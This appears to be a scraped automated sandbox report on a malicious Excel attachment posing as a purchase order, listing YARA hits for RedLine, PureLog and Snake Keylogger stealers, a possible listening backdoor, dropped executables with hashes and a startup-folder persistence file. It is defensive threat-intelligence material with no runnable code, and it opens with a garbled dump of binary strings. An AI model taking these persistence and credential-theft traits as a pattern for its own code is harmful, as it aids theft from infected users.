0#]?([0-9]\|\)?(\.[0-9]\|\.\)?[hlL]?[diouxXeEfgGs](*UCP)\XISVISIBLEISENABLEDTABLEFTTABRIGHTCURRENTTABSHOWDROPDOWNHIDEDROPDOWNADDSTRINGDELSTRINGFINDSTRINGGETCOUNTSETCURRENTSELECTIONGETCURRENTSELECTIONSELECTSTRINGISCHECKEDCHECKUNCHECKGETSELECTEDGETLINECOUNTGETCURRENTLINEGETCURRENTCOLEDITPASTEGETLINESENDCOMMANDIDGETITEMCOUNTGETSUBITEMCOUNTGETTEXTGETSELECTEDCOUNTISSELECTEDSELECTALLSELECTCLEARSELECTINVERTDESELECTFINDITEMVIEWCHANGEGETTOTALCOUNTCOLLAPSEEXPANDmsctls_statusbar321tooltips_class32%d/%02d/%02dbuttonComboboxListboxSysDateTimePick32SysMonthCal32.icl.exe.dllMsctls_Progress32msctls_trackbar32SysAnimate32msctls_updown32SysTabControl32SysTreeView32SysListView32-----@GUI_DRAGID@GUI_DROPID@GUI_DRAGFILEError text not found (please report)Q\EDEFINEUTF16)UTF)UCP)NO_AUTO_POSSESS)NO_START_OPT)LIMIT_MATCH=LIMIT_RECURSION=CR)LF)CRLF)ANY)ANYCRLF)BSR_ANYCRLF)BSR_UNICODE)argument is not a compiled regular expressionargument not compiled in 16 bit modeinternal error: opcode not recognizedinternal error: missing capturing bracketfailed to get memory
Source: name.exe	Binary or memory string: WIN_XPe
Source: name.exe	Binary or memory string: WIN_VISTA
Source: name.exe	Binary or memory string: WIN_7
Source: name.exe	Binary or memory string: WIN_8

Yara detected Credential Stealer

Source: Yara match	File source: 9.2.RegSvcs.exe.820ee8.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.RegSvcs.exe.6a5f26.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.RegSvcs.exe.820000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.RegSvcs.exe.3416458.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.RegSvcs.exe.c30000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.RegSvcs.exe.344d370.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.RegSvcs.exe.6a503e.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.RegSvcs.exe.3416458.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.RegSvcs.exe.c30000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.RegSvcs.exe.6a503e.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.RegSvcs.exe.3415570.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.RegSvcs.exe.820000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.RegSvcs.exe.344d370.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.RegSvcs.exe.6a5f26.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.RegSvcs.exe.820ee8.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.RegSvcs.exe.3415570.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000C.00000002.887588429.0000000000665000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.887663991.0000000000C30000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.888025081.0000000003411000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.887535540.0000000000820000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: RegSvcs.exe PID: 1304, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegSvcs.exe PID: 2160, type: MEMORYSTR

Remote Access Functionality

Yara detected PureLog Stealer

Source: Yara match	File source: 9.2.RegSvcs.exe.820ee8.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.RegSvcs.exe.6a5f26.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.RegSvcs.exe.820000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.RegSvcs.exe.3416458.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.RegSvcs.exe.c30000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.RegSvcs.exe.344d370.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.RegSvcs.exe.6a503e.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.RegSvcs.exe.3416458.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.RegSvcs.exe.c30000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.RegSvcs.exe.6a503e.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.RegSvcs.exe.3415570.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.RegSvcs.exe.820000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.RegSvcs.exe.344d370.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.RegSvcs.exe.6a5f26.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.RegSvcs.exe.820ee8.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.RegSvcs.exe.3415570.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000C.00000002.887588429.0000000000665000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.887663991.0000000000C30000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.888025081.0000000003411000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.887535540.0000000000820000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY

Yara detected RedLine Stealer

Source: Yara match	File source: 11.2.name.exe.560000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.name.exe.7d0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000009.00000002.887505835.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.779270718.00000000007D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.817043732.0000000000560000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

Yara detected Snake Keylogger

Source: Yara match	File source: 9.2.RegSvcs.exe.820ee8.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.RegSvcs.exe.6a5f26.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.RegSvcs.exe.820000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.RegSvcs.exe.3416458.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.RegSvcs.exe.c30000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.RegSvcs.exe.344d370.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.RegSvcs.exe.6a503e.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.RegSvcs.exe.3416458.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.RegSvcs.exe.c30000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.RegSvcs.exe.6a503e.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.RegSvcs.exe.3415570.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.RegSvcs.exe.820000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.RegSvcs.exe.344d370.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.RegSvcs.exe.6a5f26.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.RegSvcs.exe.820ee8.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.RegSvcs.exe.3415570.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000C.00000002.887588429.0000000000665000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.887712847.000000000259A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.887663991.0000000000C30000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.888025081.0000000003411000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.887535540.0000000000820000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.887712847.0000000002462000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.887723750.00000000024C5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.887723750.000000000239A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: RegSvcs.exe PID: 1304, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegSvcs.exe PID: 2160, type: MEMORYSTR

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 8_2_01071204 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,listen,WSAGetLastError,closesocket,	8_2_01071204
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 8_2_01071806 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,	8_2_01071806
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 11_2_013B1204 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,listen,WSAGetLastError,closesocket,	11_2_013B1204
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 11_2_013B1806 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,	11_2_013B1806

Windows Analysis Report
Orden de compra 0001-00255454.xlam.xlsx

Overview

General Information

Detection

Signatures

Classification

Malware Threat Intel
Provided by

Signatures

AV Detection

Exploits

Compliance

Spreading

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Screenshots

Behavior Graph

Network Map

Contacted Public IPs

Contacted Domains

Contacted URLs

ID:	1436299
Product:	CloudBasic
Start time:	10:07:50
Start date:	04.05.2024
Sample:	Orden de compra 0001-00255454.xlam.xlsx
Cookbook:	defaultwindowsofficecookbook.jbs
System description:	Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
Architecture:	WINDOWS
MD5:	a2e67a3d40ebd7f8872ebb1dda01aba9
SHA1:	27feddfa7d771ff519757beaac8c974330e14e1d
SHA256:	5242cb2077f21596ec657daf5b6c45087259b85708f959f22b2490d1a381dd36
Filetype:	Excel Microsoft Office Open XML Format document (40004/1) 83.33%

Name	Type	MD5	SHA1	SHA256
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\T76434567000[1].htm	HTML document, ASCII text, with CRLF line terminators	4F8E702CC244EC5D4DE32740C0ECBD97	3ADB1F02D5B6054DE0046E367C1D687B6CDF7AFF	9E17CB15DD75BBBD5DBB984EDA674863C3B10AB72613CF8A39A00C3E11A8492A
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\T76434567000[1].exe	PE32 executable (GUI) Intel 80386, for MS Windows	FBCCDD35EE6DCCADAEAA69E37FBBD171	D076D0BE3A846AFCE258DEF238BF7EF5FE5CACD5	A0EAE98F6ADB6DD377456733EEDC98A453211B456E7F934818B584CCC74B1DE3
C:\Users\user\AppData\Local\Temp\atule	ASCII text, with very long lines (29744), with no line terminators	518C70484039975D7C4CDF9C2801944B	7F0E0A4CE1EECC2C0ADC2475D1DB65048D2789DB	3F43AC964B27B4A9E2EE511E5309EBEA2D3EFEE90AF5C95BD4136DE09A37D741
C:\Users\user\AppData\Local\Temp\aut187.tmp	data	F1180A55F1DAC9F9BB49C5DDB5713F1B	1F23E1CA54E4C92482B9E22C86E7A856F8D91C31	9AB94DB31D4F78D1343D0FA8E82CA9092308F511D487290F7B5FF4A1E29A88BD
C:\Users\user\AppData\Local\Temp\aut1C6.tmp	data	D4675AE4BCED0DBEEDB90230CF2B6179	85785B7167135E7683795A6C56282693D7C15992	94955C3E9542147426F2538F79304E8BCAAF7D7FA0FA4EB6BEA54D790D73C9B6
C:\Users\user\AppData\Local\Temp\aut3C55.tmp	data	F1180A55F1DAC9F9BB49C5DDB5713F1B	1F23E1CA54E4C92482B9E22C86E7A856F8D91C31	9AB94DB31D4F78D1343D0FA8E82CA9092308F511D487290F7B5FF4A1E29A88BD
C:\Users\user\AppData\Local\Temp\aut3C94.tmp	data	D4675AE4BCED0DBEEDB90230CF2B6179	85785B7167135E7683795A6C56282693D7C15992	94955C3E9542147426F2538F79304E8BCAAF7D7FA0FA4EB6BEA54D790D73C9B6
C:\Users\user\AppData\Local\Temp\aut761A.tmp	data	F1180A55F1DAC9F9BB49C5DDB5713F1B	1F23E1CA54E4C92482B9E22C86E7A856F8D91C31	9AB94DB31D4F78D1343D0FA8E82CA9092308F511D487290F7B5FF4A1E29A88BD
C:\Users\user\AppData\Local\Temp\aut77DF.tmp	data	D4675AE4BCED0DBEEDB90230CF2B6179	85785B7167135E7683795A6C56282693D7C15992	94955C3E9542147426F2538F79304E8BCAAF7D7FA0FA4EB6BEA54D790D73C9B6
C:\Users\user\AppData\Local\Temp\nonhazardousness	data	CD95747202E22552AF28CF9D1B68988C	76DB6EDB8D98BD729ECC3A5B4A8C9419B40CDC8E	CF71A48EA30F65F3C0F9F72774960C557D33C9C26A66CE31ACE95826C68F5149
C:\Users\user\AppData\Local\Temp\~$imgs.xlsx	data	797869BB881CFBCDAC2064F92B26E46F	61C1B8FBF505956A77E9A79CE74EF5E281B01F4B	D4E4008DD7DFB936F22D9EF3CC569C6F88804715EAB8101045BA1CD0B081F185
C:\Users\user\AppData\Local\directory\name.exe	PE32 executable (GUI) Intel 80386, for MS Windows	CF439A4CF698F8D15901A3CAA5F503FE	B31BEE62A6893370C78F8A7D92319180E1201FF8	08934CC50B19DB7894D18CE045CFF85D884BA099801055D5062A667D4131C9B7
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\name.vbs	data	56B963F73C0E43390FF3FF4D7A017676	3B13AC1CF25CDDF48309FC03DAE0C21E501BE72D	894FD00EC8DF7058794232AEEB64467BC91FE4009F18FA1407E09E92444A9EE0
C:\Users\user\AppData\Roaming\negrett.exe	PE32 executable (GUI) Intel 80386, for MS Windows	FBCCDD35EE6DCCADAEAA69E37FBBD171	D076D0BE3A846AFCE258DEF238BF7EF5FE5CACD5	A0EAE98F6ADB6DD377456733EEDC98A453211B456E7F934818B584CCC74B1DE3
C:\Users\user\Desktop\~$Orden de compra 0001-00255454.xlam.xls	data	797869BB881CFBCDAC2064F92B26E46F	61C1B8FBF505956A77E9A79CE74EF5E281B01F4B	D4E4008DD7DFB936F22D9EF3CC569C6F88804715EAB8101045BA1CD0B081F185
C:\Users\user\Desktop\~$Orden de compra 0001-00255454.xlam.xlsx	data	797869BB881CFBCDAC2064F92B26E46F	61C1B8FBF505956A77E9A79CE74EF5E281B01F4B	D4E4008DD7DFB936F22D9EF3CC569C6F88804715EAB8101045BA1CD0B081F185

Windows Analysis Report Orden de compra 0001-00255454.xlam.xlsx

Overview

General Information

Detection

Signatures

Classification

Malware Threat Intel Provided by

Signatures

AV Detection

Exploits

Compliance

Spreading

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Screenshots

Behavior Graph

Network Map

Contacted Public IPs

Contacted Domains

Contacted URLs

Windows Analysis Report
Orden de compra 0001-00255454.xlam.xlsx

Malware Threat Intel
Provided by